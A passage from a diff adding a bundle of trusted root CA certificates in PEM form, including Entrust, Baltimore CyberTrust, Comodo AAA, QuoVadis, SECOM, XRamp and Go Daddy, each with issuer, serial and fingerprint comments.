+RW50cnVzdC5uZXQxQDA+BgNVBAsUN3d3dy5lbnRydXN0Lm5ldC9DUFNfMjA0OCBp +bmNvcnAuIGJ5IHJlZi4gKGxpbWl0cyBsaWFiLikxJTAjBgNVBAsTHChjKSAxOTk5 +IEVudHJ1c3QubmV0IExpbWl0ZWQxMzAxBgNVBAMTKkVudHJ1c3QubmV0IENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5ICgyMDQ4KTAeFw05OTEyMjQxNzUwNTFaFw0yOTA3 +MjQxNDE1MTJaMIG0MRQwEgYDVQQKEwtFbnRydXN0Lm5ldDFAMD4GA1UECxQ3d3d3 +LmVudHJ1c3QubmV0L0NQU18yMDQ4IGluY29ycC4gYnkgcmVmLiAobGltaXRzIGxp +YWIuKTElMCMGA1UECxMcKGMpIDE5OTkgRW50cnVzdC5uZXQgTGltaXRlZDEzMDEG +A1UEAxMqRW50cnVzdC5uZXQgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgKDIwNDgp +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArU1LqRKGsuqjIAcVFmQq +K0vRvwtKTY7tgHalZ7d4QMBzQshowNtTK91euHaYNZOLGp18EzoOH1u3Hs/lJBQe +sYGpjX24zGtLA/ECDNyrpUAkAH90lKGdCCmziAv1h3edVc3kw37XamSrhRSGlVuX +MlBvPci6Zgzj/L24ScF2iUkZ/cCovYmjZy/Gn7xxGWC4LeksyZB2ZnuU4q941mVT +XTzWnLLPKQP5L6RQstRIzgUyVYr9smRMDuSYB3Xbf9+5CFVghTAp+XtIpGmG4zU/ +HoZdenoVve8AjhUiVBcAkCaTvA5JaJG/+EfTnZVCwQ5N328mz8MYIWJmQ3DW1cAH +4QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUVeSB0RGAvtiJuQijMfmhJAkWuXAwDQYJKoZIhvcNAQEFBQADggEBADub +j1abMOdTmXx6eadNl9cZlZD7Bh/KM3xGY4+WZiT6QBshJ8rmcnPyT/4xmf3IDExo +U8aAghOY+rat2l098c5u9hURlIIM7j+VrxGrD9cv3h8Dj1csHsm7mhpElesYT6Yf +zX1XEC+bBAlahLVu2B064dae0Wx5XnkcFMXj0EyTO2U87d89vqbllRrDtRnDvV5b +u/8j72gZyxKTJ1wDLW8w0B62GqzeWvfRqqgnpv55gcR5mTNXuhKwqeBCbJPKVt7+ +bYQLCIt+jerXmCHG8+c8eS9enNFMFY3h7CI3zJpDC5fcgJCNs2ebb0gIFVbPv/Er +fF6adulZkMV8gzURZVE= +-----END CERTIFICATE----- + +# Issuer: CN=Baltimore CyberTrust Root O=Baltimore OU=CyberTrust +# Subject: CN=Baltimore CyberTrust Root O=Baltimore OU=CyberTrust +# Label: "Baltimore CyberTrust Root" +# Serial: 33554617 +# MD5 Fingerprint: ac:b6:94:a5:9c:17:e0:d7:91:52:9b:b1:97:06:a6:e4 +# SHA1 Fingerprint: d4:de:20:d0:5e:66:fc:53:fe:1a:50:88:2c:78:db:28:52:ca:e4:74 +# SHA256 Fingerprint: 16:af:57:a9:f6:76:b0:ab:12:60:95:aa:5e:ba:de:f2:2a:b3:11:19:d6:44:ac:95:cd:4b:93:db:f3:f2:6a:eb +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIEAgAAuTANBgkqhkiG9w0BAQUFADBaMQswCQYDVQQGEwJJ +RTESMBAGA1UEChMJQmFsdGltb3JlMRMwEQYDVQQLEwpDeWJlclRydXN0MSIwIAYD +VQQDExlCYWx0aW1vcmUgQ3liZXJUcnVzdCBSb290MB4XDTAwMDUxMjE4NDYwMFoX +DTI1MDUxMjIzNTkwMFowWjELMAkGA1UEBhMCSUUxEjAQBgNVBAoTCUJhbHRpbW9y +ZTETMBEGA1UECxMKQ3liZXJUcnVzdDEiMCAGA1UEAxMZQmFsdGltb3JlIEN5YmVy +VHJ1c3QgUm9vdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKMEuyKr +mD1X6CZymrV51Cni4eiVgLGw41uOKymaZN+hXe2wCQVt2yguzmKiYv60iNoS6zjr +IZ3AQSsBUnuId9Mcj8e6uYi1agnnc+gRQKfRzMpijS3ljwumUNKoUMMo6vWrJYeK +mpYcqWe4PwzV9/lSEy/CG9VwcPCPwBLKBsua4dnKM3p31vjsufFoREJIE9LAwqSu +XmD+tqYF/LTdB1kC1FkYmGP1pWPgkAx9XbIGevOF6uvUA65ehD5f/xXtabz5OTZy +dc93Uk3zyZAsuT3lySNTPx8kmCFcB5kpvcY67Oduhjprl3RjM71oGDHweI12v/ye +jl0qhqdNkNwnGjkCAwEAAaNFMEMwHQYDVR0OBBYEFOWdWTCCR1jMrPoIVDaGezq1 +BE3wMBIGA1UdEwEB/wQIMAYBAf8CAQMwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3 +DQEBBQUAA4IBAQCFDF2O5G9RaEIFoN27TyclhAO992T9Ldcw46QQF+vaKSm2eT92 +9hkTI7gQCvlYpNRhcL0EYWoSihfVCr3FvDB81ukMJY2GQE/szKN+OMY3EU/t3Wgx +jkzSswF07r51XgdIGn9w/xZchMB5hbgF/X++ZRGjD8ACtPhSNzkE1akxehi/oCr0 +Epn3o0WC4zxe9Z2etciefC7IpJ5OCBRLbf1wbWsaY71k5h+3zvDyny67G7fyUIhz +ksLi4xaNmjICq44Y3ekQEe5+NauQrz4wlHrQMz2nZQ/1/I6eYs9HRCwBXbsdtTLS +R9I4LtD+gdwyah617jzV/OeBHRnDJELqYzmp +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority O=Entrust, Inc. OU=www.entrust.net/CPS is incorporated by reference/(c) 2006 Entrust, Inc. +# Subject: CN=Entrust Root Certification Authority O=Entrust, Inc. OU=www.entrust.net/CPS is incorporated by reference/(c) 2006 Entrust, Inc. +# Label: "Entrust Root Certification Authority" +# Serial: 1164660820 +# MD5 Fingerprint: d6:a5:c3:ed:5d:dd:3e:00:c1:3d:87:92:1f:1d:3f:e4 +# SHA1 Fingerprint: b3:1e:b1:b7:40:e3:6c:84:02:da:dc:37:d4:4d:f5:d4:67:49:52:f9 +# SHA256 Fingerprint: 73:c1:76:43:4f:1b:c6:d5:ad:f4:5b:0e:76:e7:27:28:7c:8d:e5:76:16:c1:e6:e6:14:1a:2b:2c:bc:7d:8e:4c +-----BEGIN CERTIFICATE----- +MIIEkTCCA3mgAwIBAgIERWtQVDANBgkqhkiG9w0BAQUFADCBsDELMAkGA1UEBhMC +VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xOTA3BgNVBAsTMHd3dy5lbnRydXN0 +Lm5ldC9DUFMgaXMgaW5jb3Jwb3JhdGVkIGJ5IHJlZmVyZW5jZTEfMB0GA1UECxMW +KGMpIDIwMDYgRW50cnVzdCwgSW5jLjEtMCsGA1UEAxMkRW50cnVzdCBSb290IENl +cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA2MTEyNzIwMjM0MloXDTI2MTEyNzIw +NTM0MlowgbAxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMTkw +NwYDVQQLEzB3d3cuZW50cnVzdC5uZXQvQ1BTIGlzIGluY29ycG9yYXRlZCBieSBy +ZWZlcmVuY2UxHzAdBgNVBAsTFihjKSAyMDA2IEVudHJ1c3QsIEluYy4xLTArBgNV +BAMTJEVudHJ1c3QgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASIwDQYJ +KoZIhvcNAQEBBQADggEPADCCAQoCggEBALaVtkNC+sZtKm9I35RMOVcF7sN5EUFo +Nu3s/poBj6E4KPz3EEZmLk0eGrEaTsbRwJWIsMn/MYszA9u3g3s+IIRe7bJWKKf4 +4LlAcTfFy0cOlypowCKVYhXbR9n10Cv/gkvJrT7eTNuQgFA/CYqEAOwwCj0Yzfv9 +KlmaI5UXLEWeH25DeW0MXJj+SKfFI0dcXv1u5x609mhF0YaDW6KKjbHjKYD+JXGI +rb68j6xSlkuqUY3kEzEZ6E5Nn9uss2rVvDlUccp6en+Q3X0dgNmBu1kmwhH+5pPi +94DkZfs0Nw4pgHBNrziGLp5/V6+eF67rHMsoIV+2HNjnogQi+dPa2MsCAwEAAaOB +sDCBrTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zArBgNVHRAEJDAi +gA8yMDA2MTEyNzIwMjM0MlqBDzIwMjYxMTI3MjA1MzQyWjAfBgNVHSMEGDAWgBRo +kORnpKZTgMeGZqTx90tD+4S9bTAdBgNVHQ4EFgQUaJDkZ6SmU4DHhmak8fdLQ/uE +vW0wHQYJKoZIhvZ9B0EABBAwDhsIVjcuMTo0LjADAgSQMA0GCSqGSIb3DQEBBQUA +A4IBAQCT1DCw1wMgKtD5Y+iRDAUgqV8ZyntyTtSx29CW+1RaGSwMCPeyvIWonX9t +O1KzKtvn1ISMY/YPyyYBkVBs9F8U4pN0wBOeMDpQ47RgxRzwIkSNcUesyBrJ6Zua +AGAT/3B+XxFNSRuzFVJ7yVTav52Vr2ua2J7p8eRDjeIRRDq/r72DQnNSi6q7pynP +9WQcCk3RvKqsnyrQ/39/2n3qse0wJcGE2jTSW3iDVuycNsMm4hH2Z0kdkquM++v/ +eu6FSqdQgPCnXEqULl8FmTxSQeDNtGPPAUO6nIPcj2A781q0tHuu2guQOHXvgR1m +0vdXcDazv/wor3ElhVsT/h5/WrQ8 +-----END CERTIFICATE----- + +# Issuer: CN=AAA Certificate Services O=Comodo CA Limited +# Subject: CN=AAA Certificate Services O=Comodo CA Limited +# Label: "Comodo AAA Services root" +# Serial: 1 +# MD5 Fingerprint: 49:79:04:b0:eb:87:19:ac:47:b0:bc:11:51:9b:74:d0 +# SHA1 Fingerprint: d1:eb:23:a4:6d:17:d6:8f:d9:25:64:c2:f1:f1:60:17:64:d8:e3:49 +# SHA256 Fingerprint: d7:a7:a0:fb:5d:7e:27:31:d7:71:e9:48:4e:bc:de:f7:1d:5f:0c:3e:0a:29:48:78:2b:c8:3e:e0:ea:69:9e:f4 +-----BEGIN CERTIFICATE----- +MIIEMjCCAxqgAwIBAgIBATANBgkqhkiG9w0BAQUFADB7MQswCQYDVQQGEwJHQjEb +MBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHDAdTYWxmb3JkMRow +GAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDEhMB8GA1UEAwwYQUFBIENlcnRpZmlj +YXRlIFNlcnZpY2VzMB4XDTA0MDEwMTAwMDAwMFoXDTI4MTIzMTIzNTk1OVowezEL +MAkGA1UEBhMCR0IxGzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BwwHU2FsZm9yZDEaMBgGA1UECgwRQ29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMM +GEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczCCASIwDQYJKoZIhvcNAQEBBQADggEP +ADCCAQoCggEBAL5AnfRu4ep2hxxNRUSOvkbIgwadwSr+GB+O5AL686tdUIoWMQua +BtDFcCLNSS1UY8y2bmhGC1Pqy0wkwLxyTurxFa70VJoSCsN6sjNg4tqJVfMiWPPe +3M/vg4aijJRPn2jymJBGhCfHdr/jzDUsi14HZGWCwEiwqJH5YZ92IFCokcdmtet4 +YgNW8IoaE+oxox6gmf049vYnMlhvB/VruPsUK6+3qszWY19zjNoFmag4qMsXeDZR +rOme9Hg6jc8P2ULimAyrL58OAd7vn5lJ8S3frHRNG5i1R8XlKdH5kBjHYpy+g8cm +ez6KJcfA3Z3mNWgQIJ2P2N7Sw4ScDV7oL8kCAwEAAaOBwDCBvTAdBgNVHQ4EFgQU +oBEKIz6W8Qfs4q8p74Klf9AwpLQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQF +MAMBAf8wewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5jb21vZG9jYS5jb20v +QUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwuY29t +b2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDANBgkqhkiG9w0BAQUF +AAOCAQEACFb8AvCb6P+k+tZ7xkSAzk/ExfYAWMymtrwUSWgEdujm7l3sAg9g1o1Q +GE8mTgHj5rCl7r+8dFRBv/38ErjHT1r0iWAFf2C3BUrz9vHCv8S5dIa2LX1rzNLz +Rt0vxuBqw8M0Ayx9lt1awg6nCpnBBYurDC/zXDrPbDdVCYfeU0BsWO/8tqtlbgT2 +G9w84FoVxp7Z8VlIMCFlA2zs6SFz7JsDoeA3raAVGI/6ugLOpyypEBMs1OUIJqsi +l2D4kF501KKaU73yqWjgom7C12yxow+ev+to51byrvLjKzg6CYG1a4XXvi3tPxq3 +smPi9WIsgtRqAEFQ8TmDn5XpNpaYbg== +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 2 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 2 O=QuoVadis Limited +# Label: "QuoVadis Root CA 2" +# Serial: 1289 +# MD5 Fingerprint: 5e:39:7b:dd:f8:ba:ec:82:e9:ac:62:ba:0c:54:00:2b +# SHA1 Fingerprint: ca:3a:fb:cf:12:40:36:4b:44:b2:16:20:88:80:48:39:19:93:7c:f7 +# SHA256 Fingerprint: 85:a0:dd:7d:d7:20:ad:b7:ff:05:f8:3d:54:2b:20:9d:c7:ff:45:28:f7:d6:77:b1:83:89:fe:a5:e5:c4:9e:86 +-----BEGIN CERTIFICATE----- +MIIFtzCCA5+gAwIBAgICBQkwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMjAeFw0wNjExMjQxODI3MDBaFw0zMTExMjQxODIzMzNaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCa +GMpLlA0ALa8DKYrwD4HIrkwZhR0In6spRIXzL4GtMh6QRr+jhiYaHv5+HBg6XJxg +Fyo6dIMzMH1hVBHL7avg5tKifvVrbxi3Cgst/ek+7wrGsxDp3MJGF/hd/aTa/55J +WpzmM+Yklvc/ulsrHHo1wtZn/qtmUIttKGAr79dgw8eTvI02kfN/+NsRE8Scd3bB +rrcCaoF6qUWD4gXmuVbBlDePSHFjIuwXZQeVikvfj8ZaCuWw419eaxGrDPmF60Tp ++ARz8un+XJiM9XOva7R+zdRcAitMOeGylZUtQofX1bOQQ7dsE/He3fbE+Ik/0XX1 +ksOR1YqI0JDs3G3eicJlcZaLDQP9nL9bFqyS2+r+eXyt66/3FsvbzSUr5R/7mp/i +Ucw6UwxI5g69ybR2BlLmEROFcmMDBOAENisgGQLodKcftslWZvB1JdxnwQ5hYIiz +PtGo/KPaHbDRsSNU30R2be1B2MGyIrZTHN81Hdyhdyox5C315eXbyOD/5YDXC2Og +/zOhD7osFRXql7PSorW+8oyWHhqPHWykYTe5hnMz15eWniN9gqRMgeKh0bpnX5UH +oycR7hYQe7xFSkyyBNKr79X9DFHOUGoIMfmR2gyPZFwDwzqLID9ujWc9Otb+fVuI +yV77zGHcizN300QyNQliBJIWENieJ0f7OyHj+OsdWwIDAQABo4GwMIGtMA8GA1Ud +EwEB/wQFMAMBAf8wCwYDVR0PBAQDAgEGMB0GA1UdDgQWBBQahGK8SEwzJQTU7tD2 +A8QZRtGUazBuBgNVHSMEZzBlgBQahGK8SEwzJQTU7tD2A8QZRtGUa6FJpEcwRTEL +MAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMT +ElF1b1ZhZGlzIFJvb3QgQ0EgMoICBQkwDQYJKoZIhvcNAQEFBQADggIBAD4KFk2f +BluornFdLwUvZ+YTRYPENvbzwCYMDbVHZF34tHLJRqUDGCdViXh9duqWNIAXINzn +g/iN/Ae42l9NLmeyhP3ZRPx3UIHmfLTJDQtyU/h2BwdBR5YM++CCJpNVjP4iH2Bl +fF/nJrP3MpCYUNQ3cVX2kiF495V5+vgtJodmVjB3pjd4M1IQWK4/YY7yarHvGH5K +WWPKjaJW1acvvFYfzznB4vsKqBUsfU16Y8Zsl0Q80m/DShcK+JDSV6IZUaUtl0Ha +B0+pUNqQjZRG4T7wlP0QADj1O+hA4bRuVhogzG9Yje0uRY/W6ZM/57Es3zrWIozc +hLsib9D45MY56QSIPMO661V6bYCZJPVsAfv4l7CUW+v90m/xd2gNNWQjrLhVoQPR +TUIZ3Ph1WVaj+ahJefivDrkRoHy3au000LYmYjgahwz46P0u05B/B5EqHdZ+XIWD +mbA4CD/pXvk1B+TJYm5Xf6dQlfe6yJvmjqIBxdZmv3lh8zwc4bmCXF2gw+nYSL0Z +ohEUGW6yhhtoPkg3Goi3XZZenMfvJ2II4pEZXNLxId26F0KCl3GBUzGpn/Z9Yr9y +4aOTHcyKJloJONDO1w2AFrR4pTqHTI2KpdVGl/IsELm8VCLAAVBpQ570su9t+Oza +8eOx79+Rj1QqCyXBJhnEUhAFZdWCEOrCMc0u +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 3 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 3 O=QuoVadis Limited +# Label: "QuoVadis Root CA 3" +# Serial: 1478 +# MD5 Fingerprint: 31:85:3c:62:94:97:63:b9:aa:fd:89:4e:af:6f:e0:cf +# SHA1 Fingerprint: 1f:49:14:f7:d8:74:95:1d:dd:ae:02:c0:be:fd:3a:2d:82:75:51:85 +# SHA256 Fingerprint: 18:f1:fc:7f:20:5d:f8:ad:dd:eb:7f:e0:07:dd:57:e3:af:37:5a:9c:4d:8d:73:54:6b:f4:f1:fe:d1:e1:8d:35 +-----BEGIN CERTIFICATE----- +MIIGnTCCBIWgAwIBAgICBcYwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMzAeFw0wNjExMjQxOTExMjNaFw0zMTExMjQxOTA2NDRaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDM +V0IWVJzmmNPTTe7+7cefQzlKZbPoFog02w1ZkXTPkrgEQK0CSzGrvI2RaNggDhoB +4hp7Thdd4oq3P5kazethq8Jlph+3t723j/z9cI8LoGe+AaJZz3HmDyl2/7FWeUUr +H556VOijKTVopAFPD6QuN+8bv+OPEKhyq1hX51SGyMnzW9os2l2ObjyjPtr7guXd +8lyyBTNvijbO0BNO/79KDDRMpsMhvVAEVeuxu537RR5kFd5VAYwCdrXLoT9Cabwv +vWhDFlaJKjdhkf2mrk7AyxRllDdLkgbvBNDInIjbC3uBr7E9KsRlOni27tyAsdLT +mZw67mtaa7ONt9XOnMK+pUsvFrGeaDsGb659n/je7Mwpp5ijJUMv7/FfJuGITfhe +btfZFG4ZM2mnO4SJk8RTVROhUXhA+LjJou57ulJCg54U7QVSWllWp5f8nT8KKdjc +T5EOE7zelaTfi5m+rJsziO+1ga8bxiJTyPbH7pcUsMV8eFLI8M5ud2CEpukqdiDt +WAEXMJPpGovgc2PZapKUSU60rUqFxKMiMPwJ7Wgic6aIDFUhWMXhOp8q3crhkODZ +c6tsgLjoC2SToJyMGf+z0gzskSaHirOi4XCPLArlzW1oUevaPwV/izLmE1xr/l9A +4iLItLRkT9a6fUg+qGkM17uGcclzuD87nSVL2v9A6wIDAQABo4IBlTCCAZEwDwYD +VR0TAQH/BAUwAwEB/zCB4QYDVR0gBIHZMIHWMIHTBgkrBgEEAb5YAAMwgcUwgZMG +CCsGAQUFBwICMIGGGoGDQW55IHVzZSBvZiB0aGlzIENlcnRpZmljYXRlIGNvbnN0 +aXR1dGVzIGFjY2VwdGFuY2Ugb2YgdGhlIFF1b1ZhZGlzIFJvb3QgQ0EgMyBDZXJ0 +aWZpY2F0ZSBQb2xpY3kgLyBDZXJ0aWZpY2F0aW9uIFByYWN0aWNlIFN0YXRlbWVu +dC4wLQYIKwYBBQUHAgEWIWh0dHA6Ly93d3cucXVvdmFkaXNnbG9iYWwuY29tL2Nw +czALBgNVHQ8EBAMCAQYwHQYDVR0OBBYEFPLAE+CCQz777i9nMpY1XNu4ywLQMG4G +A1UdIwRnMGWAFPLAE+CCQz777i9nMpY1XNu4ywLQoUmkRzBFMQswCQYDVQQGEwJC +TTEZMBcGA1UEChMQUXVvVmFkaXMgTGltaXRlZDEbMBkGA1UEAxMSUXVvVmFkaXMg +Um9vdCBDQSAzggIFxjANBgkqhkiG9w0BAQUFAAOCAgEAT62gLEz6wPJv92ZVqyM0 +7ucp2sNbtrCD2dDQ4iH782CnO11gUyeim/YIIirnv6By5ZwkajGxkHon24QRiSem +d1o417+shvzuXYO8BsbRd2sPbSQvS3pspweWyuOEn62Iix2rFo1bZhfZFvSLgNLd ++LJ2w/w4E6oM3kJpK27zPOuAJ9v1pkQNn1pVWQvVDVJIxa6f8i+AxeoyUDUSly7B +4f/xI4hROJ/yZlZ25w9Rl6VSDE1JUZU2Pb+iSwwQHYaZTKrzchGT5Or2m9qoXadN +t54CrnMAyNojA+j56hl0YgCUyyIgvpSnWbWCar6ZeXqp8kokUvd0/bpO5qgdAm6x +DYBEwa7TIzdfu4V8K5Iu6H6li92Z4b8nby1dqnuH/grdS/yO9SbkbnBCbjPsMZ57 +k8HkyWkaPcBrTiJt7qtYTcbQQcEr6k8Sh17rRdhs9ZgC06DYVYoGmRmioHfRMJ6s +zHXug/WwYjnPbFfiTNKRCw51KBuav/0aQ/HKd/s7j2G4aSgWQgRecCocIdiP4b0j +Wy10QJLZYxkNc91pvGJHvOB0K7Lrfb5BG7XARsWhIstfTsEokt4YutUqKLsRixeT +mJlglFwjz1onl14LBQaTNx47aTbrqZ5hHY8y2o4M1nQ+ewkk2gF3R8Q7zTSMmfXK +4SVhM7JZG+Ju1zdXtg2pEto= +-----END CERTIFICATE----- + +# Issuer: O=SECOM Trust.net OU=Security Communication RootCA1 +# Subject: O=SECOM Trust.net OU=Security Communication RootCA1 +# Label: "Security Communication Root CA" +# Serial: 0 +# MD5 Fingerprint: f1:bc:63:6a:54:e0:b5:27:f5:cd:e7:1a:e3:4d:6e:4a +# SHA1 Fingerprint: 36:b1:2b:49:f9:81:9e:d7:4c:9e:bc:38:0f:c6:56:8f:5d:ac:b2:f7 +# SHA256 Fingerprint: e7:5e:72:ed:9f:56:0e:ec:6e:b4:80:00:73:a4:3f:c3:ad:19:19:5a:39:22:82:01:78:95:97:4a:99:02:6b:6c +-----BEGIN CERTIFICATE----- +MIIDWjCCAkKgAwIBAgIBADANBgkqhkiG9w0BAQUFADBQMQswCQYDVQQGEwJKUDEY +MBYGA1UEChMPU0VDT00gVHJ1c3QubmV0MScwJQYDVQQLEx5TZWN1cml0eSBDb21t +dW5pY2F0aW9uIFJvb3RDQTEwHhcNMDMwOTMwMDQyMDQ5WhcNMjMwOTMwMDQyMDQ5 +WjBQMQswCQYDVQQGEwJKUDEYMBYGA1UEChMPU0VDT00gVHJ1c3QubmV0MScwJQYD +VQQLEx5TZWN1cml0eSBDb21tdW5pY2F0aW9uIFJvb3RDQTEwggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQCzs/5/022x7xZ8V6UMbXaKL0u/ZPtM7orw8yl8 +9f/uKuDp6bpbZCKamm8sOiZpUQWZJtzVHGpxxpp9Hp3dfGzGjGdnSj74cbAZJ6kJ +DKaVv0uMDPpVmDvY6CKhS3E4eayXkmmziX7qIWgGmBSWh9JhNrxtJ1aeV+7AwFb9 +Ms+k2Y7CI9eNqPPYJayX5HA49LY6tJ07lyZDo6G8SVlyTCMwhwFY9k6+HGhWZq/N +QV3Is00qVUarH9oe4kA92819uZKAnDfdDJZkndwi92SL32HeFZRSFaB9UslLqCHJ +xrHty8OVYNEP8Ktw+N/LTX7s1vqr2b1/VPKl6Xn62dZ2JChzAgMBAAGjPzA9MB0G +A1UdDgQWBBSgc0mZaNyFW2XjmygvV5+9M7wHSDALBgNVHQ8EBAMCAQYwDwYDVR0T +AQH/BAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAaECpqLvkT115swW1F7NgE+vG +kl3g0dNq/vu+m22/xwVtWSDEHPC32oRYAmP6SBbvT6UL90qY8j+eG61Ha2POCEfr +Uj94nK9NrvjVT8+amCoQQTlSxN3Zmw7vkwGusi7KaEIkQmywszo+zenaSMQVy+n5 +Bw+SUEmK3TGXX8npN6o7WWWXlDLJs58+OmJYxUmtYg5xpTKqL8aJdkNAExNnPaJU +JRDL8Try2frbSVa7pv6nQTXD4IhhyYjH3zYQIphZ6rBK+1YWc26sTfcioU+tHXot +RSflMMFe8toTyyVCUZVHA4xsIcx0Qu1T/zOLjw9XARYvz6buyXAiFL39vmwLAw== +-----END CERTIFICATE----- + +# Issuer: CN=XRamp Global Certification Authority O=XRamp Security Services Inc OU=www.xrampsecurity.com +# Subject: CN=XRamp Global Certification Authority O=XRamp Security Services Inc OU=www.xrampsecurity.com +# Label: "XRamp Global CA Root" +# Serial: 107108908803651509692980124233745014957 +# MD5 Fingerprint: a1:0b:44:b3:ca:10:d8:00:6e:9d:0f:d8:0f:92:0a:d1 +# SHA1 Fingerprint: b8:01:86:d1:eb:9c:86:a5:41:04:cf:30:54:f3:4c:52:b7:e5:58:c6 +# SHA256 Fingerprint: ce:cd:dc:90:50:99:d8:da:df:c5:b1:d2:09:b7:37:cb:e2:c1:8c:fb:2c:10:c0:ff:0b:cf:0d:32:86:fc:1a:a2 +-----BEGIN CERTIFICATE----- +MIIEMDCCAxigAwIBAgIQUJRs7Bjq1ZxN1ZfvdY+grTANBgkqhkiG9w0BAQUFADCB +gjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3dy54cmFtcHNlY3VyaXR5LmNvbTEk +MCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2VydmljZXMgSW5jMS0wKwYDVQQDEyRY +UmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQxMTAxMTcx +NDA0WhcNMzUwMTAxMDUzNzE5WjCBgjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3 +dy54cmFtcHNlY3VyaXR5LmNvbTEkMCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2Vy +dmljZXMgSW5jMS0wKwYDVQQDEyRYUmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCYJB69FbS6 +38eMpSe2OAtp87ZOqCwuIR1cRN8hXX4jdP5efrRKt6atH67gBhbim1vZZ3RrXYCP +KZ2GG9mcDZhtdhAoWORlsH9KmHmf4MMxfoArtYzAQDsRhtDLooY2YKTVMIJt2W7Q +DxIEM5dfT2Fa8OT5kavnHTu86M/0ay00fOJIYRyO82FEzG+gSqmUsE3a56k0enI4 +qEHMPJQRfevIpoy3hsvKMzvZPTeL+3o+hiznc9cKV6xkmxnr9A8ECIqsAxcZZPRa +JSKNNCyy9mgdEm3Tih4U2sSPpuIjhdV6Db1q4Ons7Be7QhtnqiXtRYMh/MHJfNVi +PvryxS3T/dRlAgMBAAGjgZ8wgZwwEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0P +BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMZPoj0GY4QJnM5i5ASs +jVy16bYbMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwueHJhbXBzZWN1cml0 +eS5jb20vWEdDQS5jcmwwEAYJKwYBBAGCNxUBBAMCAQEwDQYJKoZIhvcNAQEFBQAD +ggEBAJEVOQMBG2f7Shz5CmBbodpNl2L5JFMn14JkTpAuw0kbK5rc/Kh4ZzXxHfAR +vbdI4xD2Dd8/0sm2qlWkSLoC295ZLhVbO50WfUfXN+pfTXYSNrsf16GBBEYgoyxt +qZ4Bfj8pzgCT3/3JknOJiWSe5yvkHJEs0rnOfc5vMZnT5r7SHpDwCRR5XCOrTdLa +IR9NmXmd4c8nnxCbHIgNsIpkQTG4DmyQJKSbXHGPurt+HBvbaoAPIbzp26a3QPSy +i6mx5O+aGtA9aZnuqCij4Tyz8LIRnM98QObd50N9otg6tamN8jSZxNQQ4Qb9CYQQ +O+7ETPTsJ3xCwnR8gooJybQDJbw= +-----END CERTIFICATE----- + +# Issuer: O=The Go Daddy Group, Inc. OU=Go Daddy Class 2 Certification Authority +# Subject: O=The Go Daddy Group, Inc. OU=Go Daddy Class 2 Certification Authority +# Label: "Go Daddy Class 2 CA" +# Serial: 0 +# MD5 Fingerprint: 91:de:06:25:ab:da:fd:32:17:0c:bb:25:17:2a:84:67 +# SHA1 Fingerprint: 27:96:ba:e6:3f:18:01:e2:77:26:1b:a0:d7:77:70:02:8f:20:ee:e4 +# SHA256 Fingerprint: 